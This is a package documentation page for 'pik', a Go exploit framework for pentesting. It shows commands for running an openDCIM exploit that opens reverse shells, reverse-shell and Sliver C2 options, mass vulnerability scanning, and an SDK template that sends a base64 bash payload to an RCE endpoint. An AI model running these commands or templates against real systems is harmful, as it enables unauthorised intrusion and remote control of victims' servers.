pik

v0.2.0 Latest
This package is not in the latest version of its module.
Published: Mar 2, 2026 License: AGPL-3.0

README

pik

Go exploit framework. Write exploits once, run them as standalone binaries or inside the framework with an interactive console.

Install

go install github.com/Chocapikk/pik/cmd/pik@latest

Or self-update an existing install:

pik update

Usage

pik console                              # Interactive console
pik run opendcim -t target -s LHOST=ip   # Run an exploit
pik check opendcim -t target             # Check only
pik info opendcim                        # Module details + dorks
pik build opendcim -o opendcim           # Standalone binary
pik list                                 # List all modules

Console

pik > use opendcim
pik exploit/http/linux/opendcim > show options
pik exploit/http/linux/opendcim > set TARGET http://target
pik exploit/http/linux/opendcim > set RPORT 8080
pik exploit/http/linux/opendcim > set LHOST 10.0.0.1
pik exploit/http/linux/opendcim > check
pik exploit/http/linux/opendcim > exploit
>> Session 1 opened (10.0.0.2:49326)
www-data@target:~$ ^Z
>> Session 1 backgrounded
pik exploit/http/linux/opendcim > sessions
pik exploit/http/linux/opendcim > kill 1

Commands: use, back, show options|advanced|payloads|targets|modules, set, unset, target, check, exploit, sessions, kill, search, info, resource, list, rank, help.

Ctrl+Z backgrounds a session. resource exploit.rc runs commands from a file. History persists across sessions.

C2 backends

Three built-in backends, plus Sliver integration:

# TCP reverse shell (default)
pik run opendcim -t target -s LHOST=ip

# TLS encrypted
pik run opendcim -t target -s LHOST=ip -s C2=sslshell

# HTTP polling (firewall bypass)
pik run opendcim -t target -s LHOST=ip -s C2=httpshell -s PAYLOAD=reverse_php_http

# Sliver C2
pik run opendcim -t target -s LHOST=ip -s C2=sliver -s C2CONFIG=~/.sliver/configs/operator.cfg

Scanning

pik check opendcim -f targets.txt -t 50 -o vulnerable.txt
pik check opendcim -f targets.txt -t 50 -o results.json --json

Supports HTTP/SOCKS5 proxy with -s PROXIES=socks5://127.0.0.1:1080.

Standalone binaries

Any module can be compiled into a self-contained binary (~6 MB) with check, exploit, scanner, and reverse shell listener built in:

pik build opendcim -o opendcim
./opendcim --help
./opendcim -t target -s LHOST=10.0.0.1                      # Exploit
./opendcim -t target --check                                 # Check only
./opendcim -f targets.txt --threads 50 -o vulns.txt --check  # Mass scan

All module options are passed via -s KEY=VALUE. Run --help to see available options.

Write your own exploit

package main

import (
    "github.com/Chocapikk/pik/sdk"
    _ "github.com/Chocapikk/pik/pkg/cli"
)

type MyExploit struct{ sdk.Pik }

func (m *MyExploit) Info() sdk.Info {
    return sdk.Info{
        Description: "My exploit",
        Authors:     []string{"you"},
        Reliability: sdk.Typical,
        Targets:     []sdk.Target{sdk.TargetLinux("amd64")},
    }
}

func (m *MyExploit) Check(run *sdk.Context) (sdk.CheckResult, error) {
    resp, err := run.Send(sdk.Request{Path: "vulnerable.php"})
    if err != nil {
        return sdk.Unknown(err)
    }
    if resp.ContainsAny("marker") {
        return sdk.Vulnerable("marker found")
    }
    return sdk.Safe("not vulnerable")
}

func (m *MyExploit) Exploit(run *sdk.Context) error {
    cmd := run.CommentTrail(run.Base64Bash(run.Payload()))
    _, err := run.Send(sdk.Request{
        Method: "POST",
        Path:   "rce.php",
        Form:   sdk.Values{"cmd": {cmd}},
    })
    return err
}

func main() {
    sdk.Run(&MyExploit{})
}

go build -o myexploit .
./myexploit -t http://target -s LHOST=10.0.0.1

Supply chain security

Release binaries are signed with minisign. pik update verifies the signature and checksum before replacing itself. The signing public key is embedded in the binary.
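
The verify-before-replace gate described above, as an added example (not pik's own updater code). It assumes the legacy minisign "Ed" algorithm, because prehashed "ED" signatures hash the file with BLAKE2b-512, which is outside the Go standard library; verifyRelease, signForDemo and the key id DEMOKEY1 are hypothetical names, and the key and signature are constructed at run time.

```go
package main

import (
	"crypto/ed25519"
	"crypto/sha256"
	"encoding/base64"
	"fmt"
	"strings"
)

var b64 = base64.StdEncoding

// verifyRelease gates a self-update: SHA-256 checksum, then a minisign
// signature (legacy "Ed" only). pub is "Ed" || key id (8) || key (32).
func verifyRelease(bin []byte, want [32]byte, sigFile string, pub []byte) error {
	if sha256.Sum256(bin) != want {
		return fmt.Errorf("checksum mismatch")
	}
	l := strings.Split(strings.TrimSpace(sigFile), "\n")
	if len(l) != 4 || len(pub) != 42 || !strings.HasPrefix(l[2], "trusted comment: ") {
		return fmt.Errorf("malformed signature file or key")
	}
	sig, e1 := b64.DecodeString(l[1])
	global, e2 := b64.DecodeString(l[3])
	if e1 != nil || e2 != nil || len(sig) != 74 || string(sig[:10]) != string(pub[:10]) {
		return fmt.Errorf("bad encoding, algorithm or key id")
	}
	// The global signature covers the file signature || trusted comment.
	msg := append(sig[10:74:74], l[2][len("trusted comment: "):]...)
	if !ed25519.Verify(pub[10:], bin, sig[10:]) || !ed25519.Verify(pub[10:], msg, global) {
		return fmt.Errorf("signature verification failed")
	}
	return nil
}

// signForDemo builds a constructed signature file with a throwaway key.
func signForDemo(bin []byte) (pub []byte, sigFile string) {
	pk, sk, _ := ed25519.GenerateKey(nil)
	s, c := ed25519.Sign(sk, bin), "file:pik-demo (constructed)"
	g := ed25519.Sign(sk, append(s[:64:64], c...))
	sigFile = "untrusted comment: demo\n" + b64.EncodeToString(append([]byte("EdDEMOKEY1"), s...)) +
		"\ntrusted comment: " + c + "\n" + b64.EncodeToString(g) + "\n"
	return append([]byte("EdDEMOKEY1"), pk...), sigFile // DEMOKEY1: hypothetical key id
}

func main() {
	bin := []byte("constructed release bytes")
	pub, sig := signForDemo(bin)
	fmt.Println("verify:", verifyRelease(bin, sha256.Sum256(bin), sig, pub))
}
```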

Build from source

make build                   # Dev build
make build VERSION=1.0.0     # Versioned build
make static                  # Static binary (CGO_ENABLED=0)
make install                 # Install to $GOPATH/bin
make test                    # Run tests
make vet                     # Lint

License

AGPL-3.0. Free to use for pentesting, research, CTFs, and internal security work. If you build a commercial product or service on top of pik, the AGPL requires you to open-source your entire codebase. Contact the author for commercial licensing.

Directories

Path: Synopsis
cmd
  pik: command
examples
  standalone: command
Package modules imports all exploit modules and C2 backends so they self-register via init().
pkg
  c2
  cli
  lab
  log: Package log provides zero-dependency colored terminal output.
  stager: Package stager generates TCP stager binaries at runtime.
  toolchain: Package toolchain manages the Go compiler for building standalone exploits.